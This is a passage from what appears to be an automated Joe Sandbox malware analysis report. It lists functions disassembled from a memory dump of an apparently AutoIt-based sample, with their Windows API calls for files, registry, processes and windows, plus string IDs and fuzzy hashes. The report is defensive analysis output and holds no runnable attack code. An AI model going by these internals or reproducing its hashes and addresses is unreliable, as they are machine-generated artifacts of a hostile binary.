                                                                                                                        • Part of subcall function 003A7E53: _memmove.LIBCMT ref: 003A7EB9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$_memmove
                                                                                                                      • String ID: @U=u$ComboBox$ListBox
                                                                                                                      • API String ID: 458670788-2258501812
                                                                                                                      • Opcode ID: 4e5b016a10e03afe73b5191efc4cc5125e4620e8d74253c97f002efd32f5011c
                                                                                                                      • Instruction ID: fcda63cf4d72b687fc06f3bbff024209368f5433dd15e725303b58dc7839bba0
                                                                                                                      • Opcode Fuzzy Hash: 4e5b016a10e03afe73b5191efc4cc5125e4620e8d74253c97f002efd32f5011c
                                                                                                                      • Instruction Fuzzy Hash: 57210472910104AEDB06AB64EC85DFEB7ADDF06350B18511AF421EB2E0DB788D0AD750
                                                                                                                      Function 003E69F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 93filestringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 003A31DA
                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 003E6A2B
                                                                                                                      • _wcscmp.LIBCMT ref: 003E6A49
                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 003E6A62
                                                                                                                        • Part of subcall function 003E6D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 003E6DBA
                                                                                                                        • Part of subcall function 003E6D6D: GetLastError.KERNEL32 ref: 003E6DC5
                                                                                                                        • Part of subcall function 003E6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 003E6DD9
                                                                                                                      • _wcscat.LIBCMT ref: 003E6AA4
                                                                                                                      • SHFileOperationW.SHELL32(?), ref: 003E6B0C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
                                                                                                                      • String ID: \*.*
                                                                                                                      • API String ID: 2323102230-1173974218
                                                                                                                      • Opcode ID: c0af309a3806e5f483b44d05e5e35ea9c00772209e8a1f8b48d97165de736a4e
                                                                                                                      • Instruction ID: ee015cc627ff88064d9f048a2b1f33c3666ecea363b0060ef501edfb021a8089
                                                                                                                      • Opcode Fuzzy Hash: c0af309a3806e5f483b44d05e5e35ea9c00772209e8a1f8b48d97165de736a4e
                                                                                                                      • Instruction Fuzzy Hash: BC3125B1D002686ACF51EFA4DC45BDDB7B89F18340F5045EAE505E7181EB309B49CB64
                                                                                                                      Function 003E2FCD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsnicmp
                                                                                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                      • API String ID: 1038674560-2734436370
                                                                                                                      • Opcode ID: 1316315e1e3ecbd1535669178e0715c491499818bb75efcf9460767d30a8cb39
                                                                                                                      • Instruction ID: 20fdfb2d269a7317e269d97e2841cdaa913633f8b32afb094ba07c70f52581a5
                                                                                                                      • Opcode Fuzzy Hash: 1316315e1e3ecbd1535669178e0715c491499818bb75efcf9460767d30a8cb39
                                                                                                                      • Instruction Fuzzy Hash: A32137321046B177D237B6369C0AFB773AC9F59310F10422AF486DB5C1EBA19E82D394
                                                                                                                      Function 003E17C8 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003E180D
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003E1833
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 003E1836
                                                                                                                      • SysAllocString.OLEAUT32 ref: 003E1857
                                                                                                                      • SysFreeString.OLEAUT32 ref: 003E1860
                                                                                                                      • StringFromGUID2.COMBASE(?,?,00000028), ref: 003E187A
                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 003E1888
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3761583154-0
                                                                                                                      • Opcode ID: 7c09ae2b3f4e8997c6aa39e5db3f9ac2cf3c6266daa101dcbbbf832b2e86fdf6
                                                                                                                      • Instruction ID: 4b4e8f42174bf686895e32cd0515fd2eefe12f2593a8dd55940233c750c97681
                                                                                                                      • Opcode Fuzzy Hash: 7c09ae2b3f4e8997c6aa39e5db3f9ac2cf3c6266daa101dcbbbf832b2e86fdf6
                                                                                                                      • Instruction Fuzzy Hash: FC218635700214AFDB11AFB9CC88DBE77ECEF093607418225F915DB2A0DA70EC818764
                                                                                                                      Function 003DE9B5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • IsWindowVisible.USER32(?), ref: 003DE9CD
                                                                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 003DE9EA
                                                                                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 003DEA22
                                                                                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 003DEA48
                                                                                                                      • _wcsstr.LIBCMT ref: 003DEA52
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 3902887630-2594219639
                                                                                                                      • Opcode ID: 88465ded1e9d5b9e953c1b4c0d0b281306699962cff3eba0a6229f78bac0565f
                                                                                                                      • Instruction ID: b40146d2a08bcbbe9b07d2c54fbb71f32abd36a2fcab0269546f5cd71e49ee5c
                                                                                                                      • Opcode Fuzzy Hash: 88465ded1e9d5b9e953c1b4c0d0b281306699962cff3eba0a6229f78bac0565f
                                                                                                                      • Instruction Fuzzy Hash: 8B210772604240BAEB27AB69AC45E7BBFADDF45750F11803AF809CE191DA74DC4193A0
                                                                                                                      Function 003DCA6D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003DCA86
                                                                                                                        • Part of subcall function 003A7E53: _memmove.LIBCMT ref: 003A7EB9
                                                                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 003DCAB8
                                                                                                                      • __itow.LIBCMT ref: 003DCAD0
                                                                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 003DCAF6
                                                                                                                      • __itow.LIBCMT ref: 003DCB07
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$__itow$_memmove
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 2983881199-2594219639
                                                                                                                      • Opcode ID: fde6de62cb2dadf75172265e76200053e5ccb0f0bd7de55a4bb29f328b42fe9d
                                                                                                                      • Instruction ID: a084a9b78757732350d9e64a5c8e7349134f4719264fca5b1e730f48384b315e
                                                                                                                      • Opcode Fuzzy Hash: fde6de62cb2dadf75172265e76200053e5ccb0f0bd7de55a4bb29f328b42fe9d
                                                                                                                      • Instruction Fuzzy Hash: 1521D733B202047BDB22EAA4AC46FDE7A6DEF49750F102027F905EB281D6A0CD05C3A1
                                                                                                                      Function 0040A0D6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003BC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 003BC657
                                                                                                                        • Part of subcall function 003BC619: GetStockObject.GDI32(00000011), ref: 003BC66B
                                                                                                                        • Part of subcall function 003BC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 003BC675
                                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0040A13B
                                                                                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0040A148
                                                                                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0040A153
                                                                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0040A162
                                                                                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0040A16E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                      • String ID: Msctls_Progress32
                                                                                                                      • API String ID: 1025951953-3636473452
                                                                                                                      • Opcode ID: 8041676cd21f986700c169ebb1d06728e126e688caa0ed45ff064b897e69c012
                                                                                                                      • Instruction ID: 6b9b33769ec2266b380329a4c00b76dae2ae4915cf8b145f96acedc9175bbd3c
                                                                                                                      • Opcode Fuzzy Hash: 8041676cd21f986700c169ebb1d06728e126e688caa0ed45ff064b897e69c012
                                                                                                                      • Instruction Fuzzy Hash: 4211C4B155021DBEEF115F61CC86EE77F5DEF08798F014225FA08A6090C6769C21DBA4
                                                                                                                      Function 003C4C3D Relevance: 10.5, APIs: 7, Instructions: 47threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __getptd_noexit.LIBCMT ref: 003C4C3E
                                                                                                                        • Part of subcall function 003C86B5: GetLastError.KERNEL32(?,003C0127,003C88A3,003C4673,?,?,003C0127,?,003A125D,00000058,?,?), ref: 003C86B7
                                                                                                                        • Part of subcall function 003C86B5: __calloc_crt.LIBCMT ref: 003C86D8
                                                                                                                        • Part of subcall function 003C86B5: GetCurrentThreadId.KERNEL32 ref: 003C8701
                                                                                                                        • Part of subcall function 003C86B5: SetLastError.KERNEL32(00000000,003C0127,003C88A3,003C4673,?,?,003C0127,?,003A125D,00000058,?,?), ref: 003C8719
                                                                                                                      • CloseHandle.KERNEL32(?,?,003C4C1D), ref: 003C4C52
                                                                                                                      • __freeptd.LIBCMT ref: 003C4C59
                                                                                                                      • RtlExitUserThread.NTDLL(00000000,?,003C4C1D), ref: 003C4C61
                                                                                                                      • GetLastError.KERNEL32(?,?,003C4C1D), ref: 003C4C91
                                                                                                                      • RtlExitUserThread.NTDLL(00000000,?,?,003C4C1D), ref: 003C4C98
                                                                                                                      • __freefls@4.LIBCMT ref: 003C4CB4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLastThread$ExitUser$CloseCurrentHandle__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1445074172-0
                                                                                                                      • Opcode ID: c6c9d8b97f512746ec1dde71a1be132abc8a66f7f7852ae190e43d1a75dfa02b
                                                                                                                      • Instruction ID: 7539473092b1743154a36bd6b6e86f4cf253a44753f24e49329208926374218b
                                                                                                                      • Opcode Fuzzy Hash: c6c9d8b97f512746ec1dde71a1be132abc8a66f7f7852ae190e43d1a75dfa02b
                                                                                                                      • Instruction Fuzzy Hash: BA01BC74901701AFC72ABBA4D919F097BA5AF05314B11852CF908CF262EF34EE428B91
                                                                                                                      Function 0040E13E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 0040E14D
                                                                                                                      • _memset.LIBCMT ref: 0040E15C
                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00463EE0,00463F24), ref: 0040E18B
                                                                                                                      • CloseHandle.KERNEL32 ref: 0040E19D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memset$CloseCreateHandleProcess
                                                                                                                      • String ID: $?F$>F
                                                                                                                      • API String ID: 3277943733-578166250
                                                                                                                      • Opcode ID: 350d947aafc13cc03e8197715426b96e1b270e1020ba2d23ee898edfb686d62b
                                                                                                                      • Instruction ID: 8f4bd8b7c425765924d75d0d03242874afdffff9f7ff41a00b6f2dd9f1c19a95
                                                                                                                      • Opcode Fuzzy Hash: 350d947aafc13cc03e8197715426b96e1b270e1020ba2d23ee898edfb686d62b
                                                                                                                      • Instruction Fuzzy Hash: DDF03AB1A40340BEE2109B65AC06F777A6CDB0A396F004431FA04D91A2E7FA8E1096BD
                                                                                                                      Function 003BC697 Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetClientRect.USER32(?,?), ref: 003BC6C0
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 003BC701
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 003BC729
                                                                                                                      • GetClientRect.USER32(?,?), ref: 003BC856
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 003BC86F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$Client$Window$Screen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1296646539-0
                                                                                                                      • Opcode ID: 33b82a63c367a4689dbba74ec7879698e7b57d92d9031e1bab55a0e9a636deaf
                                                                                                                      • Instruction ID: 47f4dff3e5f49c1954b57e5a70e40c9c6be996d3614d9e4f75ecd1e2c5350cd9
                                                                                                                      • Opcode Fuzzy Hash: 33b82a63c367a4689dbba74ec7879698e7b57d92d9031e1bab55a0e9a636deaf
                                                                                                                      • Instruction Fuzzy Hash: 90B15C79A10249DBDF21CFA9C4847EEB7B1FF08304F14912AED59DBA50DB30A941CB54
                                                                                                                      Function 003E9569 Relevance: 9.2, APIs: 6, Instructions: 204COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove$__itow__swprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3253778849-0
                                                                                                                      • Opcode ID: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
                                                                                                                      • Instruction ID: fa8437096f1d45f346670dcb2dc1100f985f506d17b13cb3819e2e1d0a0b24e3
                                                                                                                      • Opcode Fuzzy Hash: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
                                                                                                                      • Instruction Fuzzy Hash: 95618A3051029A9BDB07EF65CC82FFE77A9AF05318F04465AF85A6F2D2DA349D058B50
                                                                                                                      Function 00402EC7 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003ACAEE: _memmove.LIBCMT ref: 003ACB2F
                                                                                                                        • Part of subcall function 00403AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00402AA6,?,?), ref: 00403B0E
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00402FA0
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402FE0
                                                                                                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00403003
                                                                                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0040302C
                                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0040306F
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0040307C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4046560759-0
                                                                                                                      • Opcode ID: 2003d9356c6ca09238766ac067844b93a297c5dee7860301167abc2c0dd70a3e
                                                                                                                      • Instruction ID: 73537f8147ecadbecb077c1e7ed5a4d191d1a0b9dd6343819b3ee0e61f2dd73b
                                                                                                                      • Opcode Fuzzy Hash: 2003d9356c6ca09238766ac067844b93a297c5dee7860301167abc2c0dd70a3e
                                                                                                                      • Instruction Fuzzy Hash: 13517A31608200AFC715EF64C885E6BBBE8FF89304F04492EF5859B2A1DB75EA05CB52
                                                                                                                      Function 003BDB8C Relevance: 9.2, APIs: 6, Instructions: 160COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
